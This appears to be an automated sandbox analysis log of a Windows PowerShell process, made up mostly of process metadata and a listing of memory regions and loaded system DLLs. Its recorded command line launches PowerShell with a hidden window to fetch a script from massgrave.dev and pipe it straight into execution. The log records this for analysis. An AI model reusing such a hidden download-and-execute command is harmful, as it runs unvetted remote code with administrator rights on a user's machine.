# Flog Txt Version 1 # Analyzer Version: 2024.2.1 # Analyzer Build Date: Mar 23 2024 12:02:19 # Log Creation Date: 27.04.2024 09:32:41.697 Process: id = "1" image_name = "powershell.exe" filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe" page_root = "0x344aa000" os_pid = "0x12c4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "analysis_target" parent_id = "0" os_parent_pid = "0x7c0" cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -windowstyle hidden irm https://massgrave.dev/get | iex" cur_dir = "C:\\Windows\\system32\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ff75" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 119 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 120 start_va = 0xb155ed0000 end_va = 0xb155f4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000b155ed0000" filename = "" Region: id = 121 start_va = 0xb156000000 end_va = 0xb1561fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000b156000000" filename = "" Region: id = 122 start_va = 0x1e336f10000 end_va = 0x1e336f2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e336f10000" filename = "" Region: id = 123 start_va = 0x1e336f30000 end_va = 0x1e336f44fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001e336f30000" filename = "" Region: id = 124 start_va = 0x1e336f50000 end_va = 0x1e336f53fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001e336f50000" filename = "" Region: id = 125 start_va = 0x1e336f60000 end_va = 0x1e336f60fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001e336f60000" filename = "" Region: id = 126 start_va = 0x1e336f70000 end_va = 0x1e336f71fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e336f70000" filename = "" Region: id = 127 start_va = 0x7df5ff4f0000 end_va = 0x7ff5ff4effff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ff4f0000" filename = "" Region: id = 128 start_va = 0x7ff6ce950000 end_va = 0x7ff6ce972fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6ce950000" filename = "" Region: id = 129 start_va = 0x7ff6cf2d0000 end_va = 0x7ff6cf347fff monitored = 0 entry_point = 0x7ff6cf2d31a0 region_type = mapped_file name = "powershell.exe" filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe") Region: id = 130 start_va = 0x7ffbed960000 end_va = 0x7ffbedb20fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 269 start_va = 0x1e336f80000 end_va = 0x1e3371bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e336f80000" filename = "" Region: id = 270 start_va = 0x7ffbed570000 end_va = 0x7ffbed61cfff monitored = 0 entry_point = 0x7ffbed5881a0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 271 start_va = 0x7ffbea3c0000 end_va = 0x7ffbea5a7fff monitored = 0 entry_point = 0x7ffbea3eba70 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 272 start_va = 0x1e336f10000 end_va = 0x1e336f1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001e336f10000" filename = "" Region: id = 273 start_va = 0x7ff6ce850000 end_va = 0x7ff6ce94ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6ce850000" filename = "" Region: id = 274 start_va = 0x1e336f80000 end_va = 0x1e33703dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 275 start_va = 0x1e3370c0000 end_va = 0x1e3371bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e3370c0000" filename = "" Region: id = 369 start_va = 0x7ffbeaff0000 end_va = 0x7ffbeb096fff monitored = 0 entry_point = 0x7ffbeb0058d0 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 370 start_va = 0x7ffbed880000 end_va = 0x7ffbed91cfff monitored = 0 entry_point = 0x7ffbed8878a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 371 start_va = 0xb155f50000 end_va = 0xb155fcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000b155f50000" filename = "" Region: id = 372 start_va = 0x7ffbed0e0000 end_va = 0x7ffbed13afff monitored = 0 entry_point = 0x7ffbed0f38b0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 373 start_va = 0x7ffbed620000 end_va = 0x7ffbed73bfff monitored = 0 entry_point = 0x7ffbed6602b0 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 374 start_va = 0x7ffbeb410000 end_va = 0x7ffbeb552fff monitored = 0 entry_point = 0x7ffbeb438210 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 375 start_va = 0x7ffbed140000 end_va = 0x7ffbed3bcfff monitored = 0 entry_point = 0x7ffbed214970 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 376 start_va = 0x7ffbea0d0000 end_va = 0x7ffbea139fff monitored = 0 entry_point = 0x7ffbea106d50 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 377 start_va = 0x1e336f20000 end_va = 0x1e336f26fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e336f20000" filename = "" Region: id = 378 start_va = 0x7ffbeb9f0000 end_va = 0x7ffbebb75fff monitored = 0 entry_point = 0x7ffbeba3ffc0 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 379 start_va = 0x7ffbdf540000 end_va = 0x7ffbdf55dfff monitored = 0 entry_point = 0x7ffbdf543a40 region_type = mapped_file name = "atl.dll" filename = "\\Windows\\System32\\atl.dll" (normalized: "c:\\windows\\system32\\atl.dll") Region: id = 380 start_va = 0x7ffbead60000 end_va = 0x7ffbeaeb5fff monitored = 0 entry_point = 0x7ffbead6a8d0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 381 start_va = 0x7ffbeb1b0000 end_va = 0x7ffbeb270fff monitored = 0 entry_point = 0x7ffbeb1d0da0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 382 start_va = 0x7ffbd58e0000 end_va = 0x7ffbd5947fff monitored = 1 entry_point = 0x7ffbd58e4970 region_type = mapped_file name = "mscoree.dll" filename = "\\Windows\\System32\\mscoree.dll" (normalized: "c:\\windows\\system32\\mscoree.dll") Region: id = 383 start_va = 0x1e3371c0000 end_va = 0x1e33736ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e3371c0000" filename = "" Region: id = 384 start_va = 0x1e337040000 end_va = 0x1e337046fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e337040000" filename = "" Region: id = 385 start_va = 0x1e337050000 end_va = 0x1e337088fff monitored = 0 entry_point = 0x1e3370512f0 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 386 start_va = 0x1e3371c0000 end_va = 0x1e337347fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001e3371c0000" filename = "" Region: id = 387 start_va = 0x1e337360000 end_va = 0x1e33736ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e337360000" filename = "" Region: id = 388 start_va = 0x7ffbed920000 end_va = 0x7ffbed95afff monitored = 0 entry_point = 0x7ffbed9212f0 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 389 start_va = 0x1e337370000 end_va = 0x1e3374f0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001e337370000" filename = "" Region: id = 390 start_va = 0x1e337500000 end_va = 0x1e3388fffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001e337500000" filename = "" Region: id = 391 start_va = 0x1e337050000 end_va = 0x1e337052fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "powershell.exe.mui" filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\en-US\\powershell.exe.mui" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\en-us\\powershell.exe.mui") Region: id = 392 start_va = 0x1e337060000 end_va = 0x1e337060fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e337060000" filename = "" Region: id = 393 start_va = 0x1e337070000 end_va = 0x1e337070fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e337070000" filename = "" Region: id = 394 start_va = 0x1e338900000 end_va = 0x1e33895ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e338900000" filename = "" Region: id = 395 start_va = 0x1e337080000 end_va = 0x1e337086fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e337080000" filename = "" Region: id = 396 start_va = 0x1e338960000 end_va = 0x1e338a3cfff monitored = 0 entry_point = 0x1e3389be0b0 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 397 start_va = 0x7ffbe9fa0000 end_va = 0x7ffbe9faefff monitored = 0 entry_point = 0x7ffbe9fa3210 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 398 start_va = 0x7ffbe8900000 end_va = 0x7ffbe8995fff monitored = 0 entry_point = 0x7ffbe8925570 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 399 start_va = 0x1e338960000 end_va = 0x1e338b5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e338960000" filename = "" Region: id = 400 start_va = 0x1e337090000 end_va = 0x1e337090fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001e337090000" filename = "" Region: id = 401 start_va = 0x7ffbeaf40000 end_va = 0x7ffbeafe6fff monitored = 0 entry_point = 0x7ffbeaf4b4d0 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 402 start_va = 0x1e3370a0000 end_va = 0x1e3370a0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001e3370a0000" filename = "" Region: id = 403 start_va = 0x7ffbea5d0000 end_va = 0x7ffbeac13fff monitored = 0 entry_point = 0x7ffbea7964b0 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 404 start_va = 0x7ffbeac20000 end_va = 0x7ffbeac62fff monitored = 0 entry_point = 0x7ffbeac34b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 405 start_va = 0x7ffbed820000 end_va = 0x7ffbed871fff monitored = 0 entry_point = 0x7ffbed82f530 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 406 start_va = 0x7ffbea010000 end_va = 0x7ffbea0c4fff monitored = 0 entry_point = 0x7ffbea0522e0 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 407 start_va = 0x7ffbe9fb0000 end_va = 0x7ffbe9ffafff monitored = 0 entry_point = 0x7ffbe9fb35f0 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 408 start_va = 0x7ffbe9f80000 end_va = 0x7ffbe9f93fff monitored = 0 entry_point = 0x7ffbe9f852e0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 409 start_va = 0x7ffbebb80000 end_va = 0x7ffbed0defff monitored = 0 entry_point = 0x7ffbebce11f0 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 410 start_va = 0x7ffbe96e0000 end_va = 0x7ffbe96fefff monitored = 0 entry_point = 0x7ffbe96e5d30 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 411 start_va = 0x1e3370b0000 end_va = 0x1e3370b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001e3370b0000" filename = "" Region: id = 412 start_va = 0x1e338b60000 end_va = 0x1e338e96fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 413 start_va = 0x7ffbe84d0000 end_va = 0x7ffbe8655fff monitored = 0 entry_point = 0x7ffbe851d700 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 414 start_va = 0x1e337350000 end_va = 0x1e337353fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.1.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Caches\\cversions.1.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\caches\\cversions.1.db") Region: id = 415 start_va = 0x1e338900000 end_va = 0x1e338914fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000030.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000030.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000030.db") Region: id = 416 start_va = 0x1e338950000 end_va = 0x1e33895ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e338950000" filename = "" Region: id = 417 start_va = 0x1e338920000 end_va = 0x1e338920fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001e338920000" filename = "" Region: id = 418 start_va = 0xb156200000 end_va = 0xb15627ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000b156200000" filename = "" Region: id = 419 start_va = 0x1e337350000 end_va = 0x1e337353fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 420 start_va = 0x1e338960000 end_va = 0x1e3389a4fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000010.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000010.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000010.db") Region: id = 421 start_va = 0x1e338b50000 end_va = 0x1e338b5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e338b50000" filename = "" Region: id = 422 start_va = 0x1e338930000 end_va = 0x1e338933fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 423 start_va = 0x1e3389b0000 end_va = 0x1e338a3dfff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db") Region: id = 424 start_va = 0x1e338a40000 end_va = 0x1e338a50fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "propsys.dll.mui" filename = "\\Windows\\System32\\en-US\\propsys.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\propsys.dll.mui") Region: id = 425 start_va = 0x7ffbdfae0000 end_va = 0x7ffbdfaecfff monitored = 0 entry_point = 0x7ffbdfae1ea0 region_type = mapped_file name = "linkinfo.dll" filename = "\\Windows\\System32\\linkinfo.dll" (normalized: "c:\\windows\\system32\\linkinfo.dll") Region: id = 426 start_va = 0x1e338940000 end_va = 0x1e338943fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.1.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Caches\\cversions.1.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\caches\\cversions.1.db") Region: id = 427 start_va = 0x1e338a60000 end_va = 0x1e338a79fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{3da71d5a-20cc-432f-a115-dfe92379e91f}.1.ver0x0000000000000039.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Caches\\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.1.ver0x0000000000000039.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\caches\\{3da71d5a-20cc-432f-a115-dfe92379e91f}.1.ver0x0000000000000039.db") Region: id = 428 start_va = 0x7ffbe8410000 end_va = 0x7ffbe8476fff monitored = 0 entry_point = 0x7ffbe842e710 region_type = mapped_file name = "bcp47langs.dll" filename = "\\Windows\\System32\\BCP47Langs.dll" (normalized: "c:\\windows\\system32\\bcp47langs.dll") Region: id = 429 start_va = 0xb156280000 end_va = 0xb1562fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000b156280000" filename = "" Region: id = 430 start_va = 0x7ffbdd910000 end_va = 0x7ffbdd9eafff monitored = 0 entry_point = 0x7ffbdd9228b0 region_type = mapped_file name = "ntshrui.dll" filename = "\\Windows\\System32\\ntshrui.dll" (normalized: "c:\\windows\\system32\\ntshrui.dll") Region: id = 431 start_va = 0x7ffbe9c00000 end_va = 0x7ffbe9c2cfff monitored = 0 entry_point = 0x7ffbe9c19d40 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 432 start_va = 0x7ffbddc80000 end_va = 0x7ffbddca5fff monitored = 0 entry_point = 0x7ffbddc81cf0 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 433 start_va = 0x7ffbe23a0000 end_va = 0x7ffbe23b1fff monitored = 0 entry_point = 0x7ffbe23a3580 region_type = mapped_file name = "cscapi.dll" filename = "\\Windows\\System32\\cscapi.dll" (normalized: "c:\\windows\\system32\\cscapi.dll") Region: id = 434 start_va = 0x7ffbe9900000 end_va = 0x7ffbe9916fff monitored = 0 entry_point = 0x7ffbe99079d0 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 435 start_va = 0x7ffbe9590000 end_va = 0x7ffbe95c3fff monitored = 0 entry_point = 0x7ffbe95aae70 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 436 start_va = 0x7ffbe9e10000 end_va = 0x7ffbe9e38fff monitored = 0 entry_point = 0x7ffbe9e24530 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 437 start_va = 0x7ffbe9a20000 end_va = 0x7ffbe9a2afff monitored = 0 entry_point = 0x7ffbe9a219a0 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 438 start_va = 0x1e338940000 end_va = 0x1e338940fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001e338940000" filename = "" Region: id = 439 start_va = 0x7ffbd5570000 end_va = 0x7ffbd560cfff monitored = 1 entry_point = 0x7ffbd5571010 region_type = mapped_file name = "mscoreei.dll" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscoreei.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\mscoreei.dll") Region: id = 440 start_va = 0x7ffbe7f00000 end_va = 0x7ffbe7f09fff monitored = 0 entry_point = 0x7ffbe7f01350 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 441 start_va = 0x7ffbcfe20000 end_va = 0x7ffbd0805fff monitored = 1 entry_point = 0x7ffbcfe25b60 region_type = mapped_file name = "clr.dll" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\clr.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\clr.dll") Region: id = 442 start_va = 0x7ffbd5470000 end_va = 0x7ffbd5566fff monitored = 0 entry_point = 0x7ffbd5494d80 region_type = mapped_file name = "msvcr120_clr0400.dll" filename = "\\Windows\\System32\\msvcr120_clr0400.dll" (normalized: "c:\\windows\\system32\\msvcr120_clr0400.dll") Region: id = 443 start_va = 0x1e337090000 end_va = 0x1e337090fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001e337090000" filename = "" Region: id = 444 start_va = 0x1e338940000 end_va = 0x1e33894ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001e338940000" filename = "" Region: id = 445 start_va = 0x1e338a60000 end_va = 0x1e338a6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e338a60000" filename = "" Region: id = 446 start_va = 0x7ffb70710000 end_va = 0x7ffb7071ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffb70710000" filename = "" Region: id = 447 start_va = 0x7ffb70720000 end_va = 0x7ffb7072ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffb70720000" filename = "" Region: id = 448 start_va = 0x7ffb70730000 end_va = 0x7ffb707bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffb70730000" filename = "" Region: id = 449 start_va = 0x7ffb707c0000 end_va = 0x7ffb7082ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffb707c0000" filename = "" Region: id = 450 start_va = 0x1e338a70000 end_va = 0x1e338a70fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e338a70000" filename = "" Region: id = 451 start_va = 0x1e338a80000 end_va = 0x1e338a80fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e338a80000" filename = "" Region: id = 452 start_va = 0x1e338ea0000 end_va = 0x1e338f7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e338ea0000" filename = "" Region: id = 453 start_va = 0x1e338a90000 end_va = 0x1e338aaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e338a90000" filename = "" Region: id = 454 start_va = 0xb156300000 end_va = 0xb15637ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000b156300000" filename = "" Region: id = 455 start_va = 0x1e338a90000 end_va = 0x1e338a9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e338a90000" filename = "" Region: id = 456 start_va = 0x1e338aa0000 end_va = 0x1e338aaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e338aa0000" filename = "" Region: id = 457 start_va = 0x1e338f80000 end_va = 0x1e350f7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e338f80000" filename = "" Region: id = 458 start_va = 0x1e338ab0000 end_va = 0x1e338b1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e338ab0000" filename = "" Region: id = 459 start_va = 0x1e350f80000 end_va = 0x1e35108afff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e350f80000" filename = "" Region: id = 460 start_va = 0xb156380000 end_va = 0xb1563fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000b156380000" filename = "" Region: id = 461 start_va = 0x7ffbce930000 end_va = 0x7ffbcfe17fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "mscorlib.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_64\\mscorlib\\f89061884b75dab0e3967d7221e5290d\\mscorlib.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_64\\mscorlib\\f89061884b75dab0e3967d7221e5290d\\mscorlib.ni.dll") Region: id = 462 start_va = 0x7ff6ce7b0000 end_va = 0x7ff6ce84ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff6ce7b0000" filename = "" Region: id = 463 start_va = 0x7ff6ce7a0000 end_va = 0x7ff6ce7affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff6ce7a0000" filename = "" Region: id = 464 start_va = 0x1e338a90000 end_va = 0x1e338a9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e338a90000" filename = "" Region: id = 465 start_va = 0x1e338ea0000 end_va = 0x1e338f1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e338ea0000" filename = "" Region: id = 466 start_va = 0x1e338f70000 end_va = 0x1e338f7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e338f70000" filename = "" Region: id = 467 start_va = 0x1e338b20000 end_va = 0x1e338b2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e338b20000" filename = "" Region: id = 468 start_va = 0x7ffbcdce0000 end_va = 0x7ffbce923fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\60b77585c8aa9cfd1b30a64092c81041\\System.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_64\\system\\60b77585c8aa9cfd1b30a64092c81041\\system.ni.dll") Region: id = 469 start_va = 0x7ffbcd350000 end_va = 0x7ffbcdcd1fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.core.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Core\\d1da4b8a843ec63bb8be25f8202bedc1\\System.Core.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_64\\system.core\\d1da4b8a843ec63bb8be25f8202bedc1\\system.core.ni.dll") Region: id = 470 start_va = 0x7ffbd5200000 end_va = 0x7ffbd52abfff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "microsoft.powershell.consolehost.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pb378ec07#\\a98ebc5c36f6700560e2c198cb74a21e\\Microsoft.PowerShell.ConsoleHost.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_64\\microsoft.pb378ec07#\\a98ebc5c36f6700560e2c198cb74a21e\\microsoft.powershell.consolehost.ni.dll") 